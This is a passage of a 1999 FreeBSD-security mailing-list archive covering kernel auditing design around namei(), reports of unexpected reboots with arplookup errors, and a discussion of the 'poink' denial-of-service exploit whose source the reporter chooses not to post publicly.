freebsd-security@FreeBSD.ORG Subject: Re: POSIX.1E auditing support, an initial pass and some questions In-Reply-To: <199904160648.QAA06234@godzilla.zeta.org.au> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, 16 Apr 1999, Bruce Evans wrote: > >>I had suspected (and observed) as much. What is the rational behind > >>having the name lookup pull the pathname into the kernel as opposed to > >>using a copyin in the syscall and passing it in as an argument? > >>Presumably someone, somewhere has to allocate space on the stack, and if > > Space is allocated by zalloc(). Not long ago, space was allocated by > malloc(). The kernel stack may be too small to hold a name of length > MAXPATHLEN. I had wondered about that. > >>it's done in the syscall function then more argument processing is done in > >>one place? This would make at least a bit more available to an auditing > >>layer in the syscall. > > > >I think it is an old thing, conserving kernel memory. Indeed it may > >not make sense today where the vfs-name-cache is so much more efficient. > >Changing it may be a PITA. > > I think it's just centralisation. The pathname is copied in in one place > instead of in 100's of syscall functions. So the problem now is that we need to do different things with these strings in different places for the purpose of context-sensitive auditing. What do you recommend as the best way to get that string back again from namei()? I assume that ktrace just relies on the sequential execution of the syscall and the ordering of the NAMEI entries in the ktrace is really just the order the namei()'s happen to take place in the source. For auditing, we require a well-defined and consistent order, even if sections of the source change order for some reason. Nate has suggested munging ktrace to do what we need; while this is entirely possible, I'd prefer a more deterministic way of specifying the order of the items getting audited for a syscall. Robert N Watson robert@fledge.watson.org http://www.watson.org/~robert/ PGP key fingerprint: AF B5 5F FF A6 4A 79 37 ED 5F 55 E9 58 04 6A B1 Carnegie Mellon University http://www.cmu.edu/ TIS Labs at Network Associates, Inc. http://www.tis.com/ Safeport Network Services http://www.safeport.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 16 10:21:54 1999 Delivered-To: freebsd-security@freebsd.org Received: from godzilla.zeta.org.au (godzilla.zeta.org.au [203.26.10.9]) by hub.freebsd.org (Postfix) with ESMTP id E5D4E15970 for ; Fri, 16 Apr 1999 10:21:50 -0700 (PDT) (envelope-from bde@godzilla.zeta.org.au) Received: (from bde@localhost) by godzilla.zeta.org.au (8.8.7/8.8.7) id DAA22310; Sat, 17 Apr 1999 03:19:26 +1000 Date: Sat, 17 Apr 1999 03:19:26 +1000 From: Bruce Evans Message-Id: <199904161719.DAA22310@godzilla.zeta.org.au> To: bde@zeta.org.au, robert+freebsd@cyrus.watson.org Subject: Re: POSIX.1E auditing support, an initial pass and some questions Cc: freebsd-security@FreeBSD.ORG, phk@critter.freebsd.dk Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >> >I think it is an old thing, conserving kernel memory. Indeed it may >> >not make sense today where the vfs-name-cache is so much more efficient. >> >Changing it may be a PITA. >> >> I think it's just centralisation. The pathname is copied in in one place >> instead of in 100's of syscall functions. > >So the problem now is that we need to do different things with these >strings in different places for the purpose of context-sensitive auditing. >What do you recommend as the best way to get that string back again from >namei()? I assume that ktrace just relies on the sequential execution of >the syscall and the ordering of the NAMEI entries in the ktrace is really >just the order the namei()'s happen to take place in the source. For >auditing, we require a well-defined and consistent order, even if sections >of the source change order for some reason. I can't think of anything better thn depending on the order. This should work OK for most syscalls since most syscalls don't do much before calling namei(), and only call it once. For the others, if you log what they are doing before namei() then you may want to log the path before calling namei(). Bruce To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 16 14:59:25 1999 Delivered-To: freebsd-security@freebsd.org Received: from efex.light1.net (unknown [207.76.225.3]) by hub.freebsd.org (Postfix) with ESMTP id 2F3CC158DD; Fri, 16 Apr 1999 14:59:21 -0700 (PDT) (envelope-from root@efex.light1.net) Received: from localhost (root@localhost) by efex.light1.net (8.9.2/8.9.1) with ESMTP id RAA15043; Fri, 16 Apr 1999 17:57:12 -0400 (EDT) Date: Fri, 16 Apr 1999 17:57:03 -0400 (EDT) From: System Administrator To: net@freebsd.org, security@freebsd.org Subject: unexpected rebooting Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org hi... my box has been rebooting unexpectedly.. word around has been a new dos.. i have been told im out of mbuf clusters.. but im not really sure what to do around when the box reboots i get arplookup and llook errors root@efex:/var/log# zgrep arplookup messages* messages.1:Apr 16 14:30:03 efex /kernel: arplookup 207.76.225.58 failed: could not allocate llinfo messages.1:Apr 16 14:30:05 efex /kernel: arplookup 207.76.225.58 failed: could not allocate llinfo messages.1:Apr 16 14:30:06 efex /kernel: arplookup 207.76.225.58 failed: could not allocate llinfo messages.1:Apr 16 14:30:11 efex /kernel: arplookup 207.76.225.58 failed: could not allocate llinfo messages.1:Apr 16 14:30:12 efex /kernel: arplookup 207.76.225.58 failed: could not allocate llinfo messages.1:Apr 16 14:30:22 efex /kernel: arplookup 207.76.225.58 failed: could not allocate llinfo messages.1:Apr 16 14:30:23 efex /kernel: arplookup 207.76.225.58 failed: could not allocate llinfo messages.1:Apr 16 14:30:24 efex /kernel: arplookup 207.76.225.58 failed: could not allocate llinfo messages.1:Apr 16 14:30:30 efex /kernel: arplookup 207.76.225.58 failed: could not allocate llinfo then the box reboots.. not really any more information to give.. but if there is something i can give please tell me any help will be appreciated. thanks Mike To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 16 15:37:15 1999 Delivered-To: freebsd-security@freebsd.org Received: from andyo.prime.net (P3M5.prime.net.ua [195.64.229.237]) by hub.freebsd.org (Postfix) with ESMTP id 6262D14C36 for ; Fri, 16 Apr 1999 15:36:57 -0700 (PDT) (envelope-from andyo@prime.net.ua) Received: from prime.net.ua (localhost [127.0.0.1]) by andyo.prime.net (8.8.7/8.8.7) with ESMTP id BAA00729 for ; Sat, 17 Apr 1999 01:35:42 +0300 (EET DST) (envelope-from andyo@prime.net.ua) Message-ID: <3717BB37.31BC2F40@prime.net.ua> Date: Sat, 17 Apr 1999 01:35:36 +0300 From: =?koi8-r?Q?=E1=CE=C4=D2=C5=CA=20=F7=2E=20=EF=CC=C5=CA=CE=C9=CB?= (Andy V. Oleynik) Reply-To: andyo@prime.net.ua Organization: =?koi8-r?Q?=ED=2D=E9=CE=C6=CF?= X-Mailer: Mozilla 4.5 [en] (X11; I; FreeBSD 2.2.5-RELEASE i386) X-Accept-Language: ru, uk, en MIME-Version: 1.0 To: "Hmm.." Subject: Hanging up with strange redirection Content-Type: text/plain; charset=koi8-r Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I'm runnig FreeBSD.2.2.7-RELEASE. tonight I was working on my backbone. About of 1.5 hours of work I've discovered that I cant tcp foreign nodes. I've tried to ping my DNS & got a reply from one of the address assigned to p2p linking 2 my private nodes. For example if my DNS's IP is 195.64.225.1 then I've replied from one of the p2p links having address 195.64.225.249. *pinging 195.64.225.1* I was replied with 195.64.225.249. *Both are my internal addresess*. I came on the node & discovered my DNS/FW/DialUPserver/ hanging up. All the logs not kept info about smth strange. Who has any ideas? -- Andy V. Oleynik (When U aim for perfection, U discover it's a moving target Ã80) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Apr 17 1:44:47 1999 Delivered-To: freebsd-security@freebsd.org Received: from amanda.qmpgmc.ac.uk (amanda.qmpgmc.ac.uk [194.81.5.1]) by hub.freebsd.org (Postfix) with ESMTP id B5AF8151A4; Sat, 17 Apr 1999 01:44:29 -0700 (PDT) (envelope-from greg@qmpgmc.ac.uk) Received: from greg (gquinlan [194.81.0.56]) by amanda.qmpgmc.ac.uk (8.9.3/8.9.3) with SMTP id JAA17018; Sat, 17 Apr 1999 09:41:58 +0100 (BST) Reply-To: "Greg Quinlan" From: "Greg Quinlan" To: "System Administrator" , , Subject: Re: unexpected rebooting Date: Wed, 21 Apr 1999 09:42:02 +0100 Message-ID: <01be8bd2$d3fcb6a0$380051c2@greg.qmpgmc.ac.uk> MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 4.71.1712.3 X-MimeOLE: Produced By Microsoft MimeOLE V4.71.1712.3 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Mike, I have had a similar thing, my server unexpectedly reboots, I run 3.1-Release but intend on going to 3.1-Stable. I was told that it may have something the do with an error in VM. I do not get any ARP errors! (Our problems may be unrelated) Greg -----Original Message----- From: System Administrator To: net@FreeBSD.ORG ; security@FreeBSD.ORG Date: 16 April 1999 22:58 Subject: unexpected rebooting >hi... >my box has been rebooting unexpectedly.. word around has been a new dos.. >i have been told im out of mbuf clusters.. but im not really sure what to >do >around when the box reboots i get arplookup and llook errors >root@efex:/var/log# zgrep arplookup messages* >messages.1:Apr 16 14:30:03 efex /kernel: arplookup 207.76.225.58 failed: >could not allocate llinfo >messages.1:Apr 16 14:30:05 efex /kernel: arplookup 207.76.225.58 failed: >could not allocate llinfo >messages.1:Apr 16 14:30:06 efex /kernel: arplookup 207.76.225.58 failed: >could not allocate llinfo >messages.1:Apr 16 14:30:11 efex /kernel: arplookup 207.76.225.58 failed: >could not allocate llinfo >messages.1:Apr 16 14:30:12 efex /kernel: arplookup 207.76.225.58 failed: >could not allocate llinfo >messages.1:Apr 16 14:30:22 efex /kernel: arplookup 207.76.225.58 failed: >could not allocate llinfo >messages.1:Apr 16 14:30:23 efex /kernel: arplookup 207.76.225.58 failed: >could not allocate llinfo >messages.1:Apr 16 14:30:24 efex /kernel: arplookup 207.76.225.58 failed: >could not allocate llinfo >messages.1:Apr 16 14:30:30 efex /kernel: arplookup 207.76.225.58 failed: >could not allocate llinfo > >then the box reboots.. >not really any more information to give.. but if there is something i can >give please tell me >any help will be appreciated. > >thanks >Mike > > > > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Apr 17 12:46:36 1999 Delivered-To: freebsd-security@freebsd.org Received: from kizmiaz.dis.org (kizmiaz.dis.org [209.157.93.60]) by hub.freebsd.org (Postfix) with ESMTP id 54853150FD for ; Sat, 17 Apr 1999 12:46:34 -0700 (PDT) (envelope-from daver@kizmiaz.dis.org) Received: (from daver@localhost) by kizmiaz.dis.org (8.9.2.Beta4/8.9.2.Beta4) id MAA00996 for freebsd-security@freebsd.org; Sat, 17 Apr 1999 12:44:11 -0700 (PDT) Date: Sat, 17 Apr 1999 12:44:11 -0700 (PDT) From: Evil Dave Message-Id: <199904171944.MAA00996@kizmiaz.dis.org> To: freebsd-security@freebsd.org Subject: pam integration Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org are there any plans to integrate the pam authentication schemes into the dist ftpd and su binaries? from what i can tell this is yet to be done. thanks To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 19 7:49:48 1999 Delivered-To: freebsd-security@freebsd.org Received: from hiway1.exit109.com (hiway1.exit109.com [208.225.64.3]) by hub.freebsd.org (Postfix) with ESMTP id 88EB215599 for ; Mon, 19 Apr 1999 07:49:45 -0700 (PDT) (envelope-from freebsd@hiway1.exit109.com) Received: from localhost (freebsd@localhost) by hiway1.exit109.com (8.9.3/8.7.3) with SMTP id KAA11027 for ; Mon, 19 Apr 1999 10:47:19 -0400 (EDT) Date: Mon, 19 Apr 1999 10:47:18 -0400 (EDT) From: Chris To: security@freebsd.org Subject: poink and freebsd Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org to all- im sure ya'll have heard of poink, an exploit against freebsd/openbsd machines (these are the boxes i have tested on) it appears to work very efficiently in killing freebsd 3.1 - freebsd 3.0 machines, against one of our freebsd 2.2.5 machines, it did bring up the error messages in /var/log/messages (arp lookups) but didnt kill the machine like the others... im just wondering if there are any patches for this, and i noticed there is no mention of it on freebsd's website.... -Chris Systems Administration To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 19 8:59:24 1999 Delivered-To: freebsd-security@freebsd.org Received: from fledge.watson.org (fledge.watson.org [204.156.12.50]) by hub.freebsd.org (Postfix) with ESMTP id 7544714F4A for ; Mon, 19 Apr 1999 08:59:21 -0700 (PDT) (envelope-from robert@cyrus.watson.org) Received: from fledge.watson.org (robert@fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.8.8/8.8.8) with SMTP id LAA14758; Mon, 19 Apr 1999 11:56:48 -0400 (EDT) (envelope-from robert@cyrus.watson.org) Date: Mon, 19 Apr 1999 11:56:48 -0400 (EDT) From: Robert Watson X-Sender: robert@fledge.watson.org Reply-To: Robert Watson To: Chris Cc: security@freebsd.org Subject: Re: poink and freebsd In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, 19 Apr 1999, Chris wrote: > im sure ya'll have heard of poink, an exploit against freebsd/openbsd > machines (these are the boxes i have tested on) it appears to work very > efficiently in killing freebsd 3.1 - freebsd 3.0 machines, against one of > our freebsd 2.2.5 machines, it did bring up the error messages in > /var/log/messages (arp lookups) but didnt kill the machine like the > others... > > im just wondering if there are any patches for this, and i noticed there > is no mention of it on freebsd's website.... Interestingly, I haven't heard about this one, and it doesn't appear to be on rootshell, etc. The only "poink" I could find reference to was an alternative ping program that doesn't require root access--I assume that means it uses udp or something to try and get a response (perhaps looking for a connection refused ICMP except on the socket?). I may just have missed it in passing, of course, given the vast quantities of email that go through around here :-). Since it doesn't appear to have been reported, send a copy of the source to security-officer@freebsd.org, and feel free to CC me a copy so I can take a look. Robert N Watson robert@fledge.watson.org http://www.watson.org/~robert/ PGP key fingerprint: AF B5 5F FF A6 4A 79 37 ED 5F 55 E9 58 04 6A B1 Carnegie Mellon University http://www.cmu.edu/ TIS Labs at Network Associates, Inc. http://www.tis.com/ Safeport Network Services http://www.safeport.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 19 10: 8:27 1999 Delivered-To: freebsd-security@freebsd.org Received: from phoenix.unacom.com (phoenix.unacom.com [206.113.48.50]) by hub.freebsd.org (Postfix) with SMTP id C7E30154BA for ; Mon, 19 Apr 1999 10:08:17 -0700 (PDT) (envelope-from geniusj@phoenix.unacom.com) Received: (qmail 68837 invoked by uid 1000); 19 Apr 1999 17:05:51 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 19 Apr 1999 17:05:51 -0000 Date: Mon, 19 Apr 1999 13:05:45 -0400 (EDT) From: The Tech-Admin Dude To: Robert Watson Cc: Chris , security@freebsd.org Subject: Re: poink and freebsd In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Better yet, post a copy to the mailing list :-).. I have heard of it, but i have not tried it nor seen the effects of it.. post the source up here.. Thanks - -JD- On Mon, 19 Apr 1999, Robert Watson wrote: > On Mon, 19 Apr 1999, Chris wrote: > > > im sure ya'll have heard of poink, an exploit against freebsd/openbsd > > machines (these are the boxes i have tested on) it appears to work very > > efficiently in killing freebsd 3.1 - freebsd 3.0 machines, against one of > > our freebsd 2.2.5 machines, it did bring up the error messages in > > /var/log/messages (arp lookups) but didnt kill the machine like the > > others... > > > > im just wondering if there are any patches for this, and i noticed there > > is no mention of it on freebsd's website.... > > Interestingly, I haven't heard about this one, and it doesn't appear to be > on rootshell, etc. The only "poink" I could find reference to was an > alternative ping program that doesn't require root access--I assume that > means it uses udp or something to try and get a response (perhaps looking > for a connection refused ICMP except on the socket?). I may just have > missed it in passing, of course, given the vast quantities of email that > go through around here :-). > > Since it doesn't appear to have been reported, send a copy of the source > to security-officer@freebsd.org, and feel free to CC me a copy so I can > take a look. > > Robert N Watson > > robert@fledge.watson.org http://www.watson.org/~robert/ > PGP key fingerprint: AF B5 5F FF A6 4A 79 37 ED 5F 55 E9 58 04 6A B1 > > Carnegie Mellon University http://www.cmu.edu/ > TIS Labs at Network Associates, Inc. http://www.tis.com/ > Safeport Network Services http://www.safeport.com/ > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > -----BEGIN PGP SIGNATURE----- Version: PGPfreeware 5.0i for non-commercial use Charset: noconv iQA/AwUBNxtibtGMB8VPlu8bEQJ/rgCgp469vqIP+XvUBt8E6p+eWv8kM9YAoJVE JPNHwoC9dFTZuubRq8AxjIej =neIQ -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 19 10:12:54 1999 Delivered-To: freebsd-security@freebsd.org Received: from hiway1.exit109.com (hiway1.exit109.com [208.225.64.3]) by hub.freebsd.org (Postfix) with ESMTP id A6C1715399 for ; Mon, 19 Apr 1999 10:12:43 -0700 (PDT) (envelope-from freebsd@hiway1.exit109.com) Received: from localhost (freebsd@localhost) by hiway1.exit109.com (8.9.3/8.7.3) with SMTP id NAA11310; Mon, 19 Apr 1999 13:10:08 -0400 (EDT) Date: Mon, 19 Apr 1999 13:10:08 -0400 (EDT) From: Chris To: The Tech-Admin Dude Cc: security@freebsd.org Subject: Re: poink and freebsd In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org jd- id rather not post the source to the list, since this is how exploits get distributed, and bad things occur. i sent email to the security-officer, and a few people to test it out with their setup.. id rather not distribute it any further... i hope you understand my reasoning behind it :/ -Chris O'Hara Systems Administration On Mon, 19 Apr 1999, The Tech-Admin Dude wrote: > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > Better yet, post a copy to the mailing list :-).. I have heard of it, but > i have not tried it nor seen the effects of it.. post the source up here.. > Thanks > > - -JD- > > On Mon, 19 Apr 1999, Robert Watson wrote: > > > On Mon, 19 Apr 1999, Chris wrote: > > > > > im sure ya'll have heard of poink, an exploit against freebsd/openbsd > > > machines (these are the boxes i have tested on) it appears to work very > > > efficiently in killing freebsd 3.1 - freebsd 3.0 machines, against one of > > > our freebsd 2.2.5 machines, it did bring up the error messages in > > > /var/log/messages (arp lookups) but didnt kill the machine like the > > > others... > > > > > > im just wondering if there are any patches for this, and i noticed there > > > is no mention of it on freebsd's website.... > > > > Interestingly, I haven't heard about this one, and it doesn't appear to be > > on rootshell, etc. The only "poink" I could find reference to was an > > alternative ping program that doesn't require root access--I assume that > > means it uses udp or something to try and get a response (perhaps looking > > for a connection refused ICMP except on the socket?). I may just have > > missed it in passing, of course, given the vast quantities of email that > > go through around here :-). > > > > Since it doesn't appear to have been reported, send a copy of the source > > to security-officer@freebsd.org, and feel free to CC me a copy so I can > > take a look. > > > > Robert N Watson > > > > robert@fledge.watson.org http://www.watson.org/~robert/ > > PGP key fingerprint: AF B5 5F FF A6 4A 79 37 ED 5F 55 E9 58 04 6A B1 > > > > Carnegie Mellon University http://www.cmu.edu/ > > TIS Labs at Network Associates, Inc. http://www.tis.com/ > > Safeport Network Services http://www.safeport.com/ > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > > > -----BEGIN PGP SIGNATURE----- > Version: PGPfreeware 5.0i for non-commercial use > Charset: noconv > > iQA/AwUBNxtibtGMB8VPlu8bEQJ/rgCgp469vqIP+XvUBt8E6p+eWv8kM9YAoJVE > JPNHwoC9dFTZuubRq8AxjIej > =neIQ > -----END PGP SIGNATURE----- > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 19 10:22:21 1999 Delivered-To: freebsd-security@freebsd.org Received: from consuela.megasurf.net (consuela.megasurf.net [209.96.180.2]) by hub.freebsd.org (Postfix) with ESMTP id F1BAC155C4 for ; Mon, 19 Apr 1999 10:22:16 -0700 (PDT) (envelope-from dhundley@megasurf.net) Received: from consuela.megasurf.net (consuela.megasurf.net [209.96.180.2]) by consuela.megasurf.net (8.8.8/8.6.12) with ESMTP id KAA19386; Mon, 19 Apr 1999 10:20:19 -0400 (EDT) Date: Mon, 19 Apr 1999 10:20:19 -0400 (EDT) From: Del Hundley To: Chris Cc: The Tech-Admin Dude , security@FreeBSD.ORG Subject: Re: poink and freebsd In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Many NOCs thank you for that Chris. Del Hundley On Mon, 19 Apr 1999, Chris wrote: > jd- > > id rather not post the source to the list, since this is how exploits get > distributed, and bad things occur. i sent email to the security-officer, > and a few people to test it out with their setup.. id rather not > distribute it any further... i hope you understand my reasoning behind it > :/ > > -Chris O'Hara > Systems Administration > > On Mon, 19 Apr 1999, The Tech-Admin Dude wrote: > > > -----BEGIN PGP SIGNED MESSAGE----- > > Hash: SHA1 > > > > Better yet, post a copy to the mailing list :-).. I have heard of it, but > > i have not tried it nor seen the effects of it.. post the source up here.. > > Thanks > > > > - -JD- > > > > On Mon, 19 Apr 1999, Robert Watson wrote: > > > > > On Mon, 19 Apr 1999, Chris wrote: > > > > > > > im sure ya'll have heard of poink, an exploit against freebsd/openbsd > > > > machines (these are the boxes i have tested on) it appears to work very > > > > efficiently in killing freebsd 3.1 - freebsd 3.0 machines, against one of > > > > our freebsd 2.2.5 machines, it did bring up the error messages in > > > > /var/log/messages (arp lookups) but didnt kill the machine like the > > > > others... > > > > > > > > im just wondering if there are any patches for this, and i noticed there > > > > is no mention of it on freebsd's website.... > > > > > > Interestingly, I haven't heard about this one, and it doesn't appear to be > > > on rootshell, etc. The only "poink" I could find reference to was an > > > alternative ping program that doesn't require root access--I assume that > > > means it uses udp or something to try and get a response (perhaps looking > > > for a connection refused ICMP except on the socket?). I may just have > > > missed it in passing, of course, given the vast quantities of email that > > > go through around here :-). > > > > > > Since it doesn't appear to have been reported, send a copy of the source > > > to security-officer@freebsd.org, and feel free to CC me a copy so I can > > > take a look. > > > > > > Robert N Watson > > > > > > robert@fledge.watson.org http://www.watson.org/~robert/ > > > PGP key fingerprint: AF B5 5F FF A6 4A 79 37 ED 5F 55 E9 58 04 6A B1 > > > > > > Carnegie Mellon University http://www.cmu.edu/ > > > TIS Labs at Network Associates, Inc. http://www.tis.com/ > > > Safeport Network Services http://www.safeport.com/ > > > > > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > > with "unsubscribe freebsd-security" in the body of the message > > > > > > > -----BEGIN PGP SIGNATURE----- > > Version: PGPfreeware 5.0i for non-commercial use > > Charset: noconv > > > > iQA/AwUBNxtibtGMB8VPlu8bEQJ/rgCgp469vqIP+XvUBt8E6p+eWv8kM9YAoJVE > > JPNHwoC9dFTZuubRq8AxjIej > > =neIQ > > -----END PGP SIGNATURE----- > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 19 10:52:48 1999 Delivered-To: freebsd-security@freebsd.org Received: from tesla-e0.salk.edu (tesla-e0.salk.edu [198.202.70.1]) by hub.freebsd.org (Postfix) with ESMTP id DA17914DB2 for ; Mon, 19 Apr 1999 10:52:34 -0700 (PDT) (envelope-from jorge@salk.edu) Received: from davinci.salk.edu (davinci.salk.edu [198.202.70.31]) by tesla-e0.salk.edu (8.7.5/8.7.3) with SMTP id KAA07151; Mon, 19 Apr 1999 10:49:56 -0700 (PDT) Date: Mon, 19 Apr 1999 10:49:54 -0700 (PDT) From: Jorge Aldana To: Del Hundley Cc: Chris , The Tech-Admin Dude , security@FreeBSD.ORG Subject: Re: poink and freebsd In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Well not necessarily the source but what do we look out for to know that it is running, being used in or against my system? You mentioned /var/log/messages (arp messages) could you be more specific? Jorge On Mon, 19 Apr 1999, Del Hundley wrote: > Many NOCs thank you for that Chris. > > Del Hundley > > On Mon, 19 Apr 1999, Chris wrote: > > > jd- > > > > id rather not post the source to the list, since this is how exploits get > > distributed, and bad things occur. i sent email to the security-officer, > > and a few people to test it out with their setup.. id rather not > > distribute it any further... i hope you understand my reasoning behind it > > :/ > > > > -Chris O'Hara > > Systems Administration > > > > On Mon, 19 Apr 1999, The Tech-Admin Dude wrote: > > > > > -----BEGIN PGP SIGNED MESSAGE----- > > > Hash: SHA1 > > > > > > Better yet, post a copy to the mailing list :-).. I have heard of it, but > > > i have not tried it nor seen the effects of it.. post the source up here.. > > > Thanks > > > > > > - -JD- > > > > > > On Mon, 19 Apr 1999, Robert Watson wrote: > > > > > > > On Mon, 19 Apr 1999, Chris wrote: > > > > > > > > > im sure ya'll have heard of poink, an exploit against freebsd/openbsd > > > > > machines (these are the boxes i have tested on) it appears to work very > > > > > efficiently in killing freebsd 3.1 - freebsd 3.0 machines, against one of > > > > > our freebsd 2.2.5 machines, it did bring up the error messages in > > > > > /var/log/messages (arp lookups) but didnt kill the machine like the > > > > > others... > > > > > > > > > > im just wondering if there are any patches for this, and i noticed there > > > > > is no mention of it on freebsd's website.... > > > > > > > > Interestingly, I haven't heard about this one, and it doesn't appear to be > > > > on rootshell, etc. The only "poink" I could find reference to was an > > > > alternative ping program that doesn't require root access--I assume that > > > > means it uses udp or something to try and get a response (perhaps looking > > > > for a connection refused ICMP except on the socket?). I may just have > > > > missed it in passing, of course, given the vast quantities of email that > > > > go through around here :-). > > > > > > > > Since it doesn't appear to have been reported, send a copy of the source > > > > to security-officer@freebsd.org, and feel free to CC me a copy so I can > > > > take a look. > > > > > > > > Robert N Watson > > > > > > > > robert@fledge.watson.org http://www.watson.org/~robert/ > > > > PGP key fingerprint: AF B5 5F FF A6 4A 79 37 ED 5F 55 E9 58 04 6A B1 > > > > > > > > Carnegie Mellon University http://www.cmu.edu/ > > > > TIS Labs at Network Associates, Inc. http://www.tis.com/ > > > > Safeport Network Services http://www.safeport.com/ > > > > > > > > > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > > > with "unsubscribe freebsd-security" in the body of the message > > > > > > > > > > -----BEGIN PGP SIGNATURE----- > > > Version: PGPfreeware 5.0i for non-commercial use > > > Charset: noconv > > > > > > iQA/AwUBNxtibtGMB8VPlu8bEQJ/rgCgp469vqIP+XvUBt8E6p+eWv8kM9YAoJVE > > > JPNHwoC9dFTZuubRq8AxjIej > > > =neIQ > > > -----END PGP SIGNATURE----- > > > > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 19 10:52:57 1999 Delivered-To: freebsd-security@freebsd.org Received: from coredump.arc.nasa.gov (coredump.arc.nasa.gov [128.102.33.29]) by hub.freebsd.org (Postfix) with ESMTP id 48D411554D for ; Mon, 19 Apr 1999 10:52:49 -0700 (PDT) (envelope-from cyarnell@coredump.arc.nasa.gov) Received: from localhost (cyarnell@localhost) by coredump.arc.nasa.gov (8.9.3/8.9.3) with ESMTP id KAA28841; Mon, 19 Apr 1999 10:50:20 -0700 (PDT) Date: Mon, 19 Apr 1999 10:50:20 -0700 (PDT) From: Chris Yarnell To: Chris Cc: security@FreeBSD.ORG Subject: Re: poink and freebsd In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org It was already posted to Bugtraq. Hardly secret. :) > id rather not post the source to the list, since this is how exploits get > distributed, and bad things occur. i sent email to the security-officer, > and a few people to test it out with their setup.. id rather not > distribute it any further... i hope you understand my reasoning behind it To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 19 10:57:26 1999 Delivered-To: freebsd-security@freebsd.org Received: from gatekeeper.iserver.com (gatekeeper.iserver.com [192.41.0.2]) by hub.freebsd.org (Postfix) with ESMTP id E5C0E15713 for ; Mon, 19 Apr 1999 10:57:18 -0700 (PDT) (envelope-from hart@iserver.com) Received: by gatekeeper.iserver.com; Mon, 19 Apr 1999 11:54:52 -0600 (MDT) Received: from unknown(192.168.1.109) by gatekeeper.iserver.com via smap (V3.1.1) id xma009311; Mon, 19 Apr 99 11:54:42 -0600 Received: (hart@localhost) by anchovy.orem.iserver.com (8.9.2) id LAA00312; Mon, 19 Apr 1999 11:54:21 -0600 (MDT) Date: Mon, 19 